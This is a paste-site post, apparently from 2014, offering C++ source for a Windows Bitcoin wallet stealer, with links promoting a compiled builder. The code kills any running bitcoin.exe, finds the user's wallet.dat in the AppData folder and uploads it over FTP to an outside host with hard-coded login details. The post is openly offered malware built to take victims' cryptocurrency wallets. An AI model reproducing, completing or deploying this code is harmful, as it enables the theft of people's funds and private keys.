Bitcoin Wallet Stealer + Source

SUBMITTED BY: Guest

DATE: May 25, 2014, 5:58 p.m.

FORMAT: Text only

SIZE: 3.5 kB

Raw Download

HITS: 637

Report
  1. // Coded by JuryBen
  2. // Gimme coins
  3. //Uploaded by AnonymousX
  4. //Compiled EXE version stub + maker found here http://a-ad-s.blogspot.com/
  7. #include <windows.h>
  8. #include <tlhelp32.h>
  9. #include <tchar.h>
  11. #include <wininet.h>
  12. #include <ctime>
  13. #include <iostream>
  14. #pragma comment(lib, "wininet")
  16. void killprocess()
  17. {
  18. HANDLE hProcessSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0 );
  19. // Get the process list snapshot.
  20. PROCESSENTRY32 ProcessEntry = { 0 };
  21. // Initialize the process entry structure.
  22. ProcessEntry.dwSize = sizeof( ProcessEntry );
  23. // Get the first process info
  24. BOOL Return = FALSE;
  25. Return = Process32First( hProcessSnapShot,&ProcessEntry );
  26. int value = _tcsicmp(ProcessEntry.szExeFile, _T("bitcoin.exe"));
  27. if (value==0)
  28. {
  29. HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, ProcessEntry.th32ProcessID);
  30. //Open Process to terminate
  31. TerminateProcess(hProcess,0);
  32. CloseHandle(hProcess); //Close Handle }
  33. }
  34. while( Process32Next( hProcessSnapShot, &ProcessEntry ));
  35. CloseHandle( hProcessSnapShot );
  36. }
  38. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
  39. {
  40. killprocess();
  41. Sleep(40000);
  42. srand((unsigned)time(NULL)); // we get time to use for random seed
  43. int seedone=rand(); // seed one
  44. int seedtwo=rand()*3; // seed two times 3
  45. int seedboth = seedone + seedtwo; // combine seeds to ensure random int
  46. // now we need to convert int to char
  47. char randomseed[99]; // make randomseed buffer at 99 to prevent overflow
  48. itoa(seedboth,randomseed,10); // use itoa, [int (seedboth), randomseed (random is now seedboth but in char), value (10 coverts to decimal)
  49. // did this so the wallet.dat file wouldn't be overwritten in ftp because of same file name
  51. char* appdata = getenv("APPDATA"); //Gets %Appdata% path
  52. char* truepath = strcat(appdata, "\\Bitcoin\\wallet.dat"); //Bitcoin file to steal
  54. //ftp connection
  55. HINTERNET hInternet;
  56. HINTERNET hFtpSession;
  57. hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_DIRECT,NULL,NULL,0);
  58. hFtpSession = InternetConnect(hInternet, "ftp.host.com", INTERNET_DEFAULT_FTP_PORT, "user@host.com", "bigdickben", INTERNET_SERVICE_FTP, 0, 0); //ftp host, user, pass
  60. FtpPutFile(hFtpSession, truepath , randomseed , FTP_TRANSFER_TYPE_BINARY, 0);
  61. FtpPutFile(hFtpSession, truepath, randomseed, FTP_TRANSFER_TYPE_BINARY, 0);
  63. InternetCloseHandle(hFtpSession);
  64. InternetCloseHandle(hInternet);
  66. return 0;
  67. }
  74. For More Join
  76. http://tools-and-scripts.blogspot.com/
comments powered by Disqus